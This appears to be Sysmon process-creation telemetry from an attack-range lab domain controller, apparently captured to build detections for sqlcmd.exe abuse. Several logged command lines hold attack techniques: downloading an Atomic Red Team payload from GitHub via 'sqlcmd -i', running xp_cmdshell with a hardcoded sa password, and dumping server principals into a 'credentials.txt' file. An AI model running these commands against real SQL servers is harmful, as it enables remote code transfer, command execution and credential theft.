154100x8000000000000000124608Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:50:24.359{39524062-2980-679d-5304-000000000402}4796C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -?C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124553Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:40:41.351{39524062-2739-679d-1b04-000000000402}4324C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -i https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip -o C:\T1105.zipC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124343Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:54.388{39524062-1f8a-679d-5903-000000000402}7232C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S localhost -U sa -P password123 -Q "EXEC xp_cmdshell 'whoami'" -o C:\Windows\Temp\output.txtC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124342Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:52.295{39524062-1f88-679d-5803-000000000402}7692C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S 127.0.0.1 -Q "SELECT name FROM master.sys.databases; SELECT name FROM master.sys.tables" -EC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124341Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:50.228{39524062-1f86-679d-5703-000000000402}2716C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S localhost -Q "SELECT * FROM master.sys.server_principals" -o C:\Users\Public\credentials.txtC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124304Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:00:51.051{39524062-1de3-679d-3103-000000000402}8004C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -?C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124287Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 18:57:17.130{39524062-1d0d-679d-2003-000000000402}6084C:\Windows\System32\find.exe10.0.20348.1 (WinBuild.160101.0800)Find String (grep) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFIND.EXE"C:\Windows\system32\find.exe" sqlcmd.exeC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=97CD3C52680200280B2F2D39A67CC4F9,SHA256=7EAFBD12C5E2BA1172B225655DBEFD7A6081FBF803D553BE0ED5990EF5331973,IMPHASH=53D01F599FA823367954405BF5F690B3{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
154100x8000000000000000124281Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 18:57:04.697{39524062-1d00-679d-1a03-000000000402}1388C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator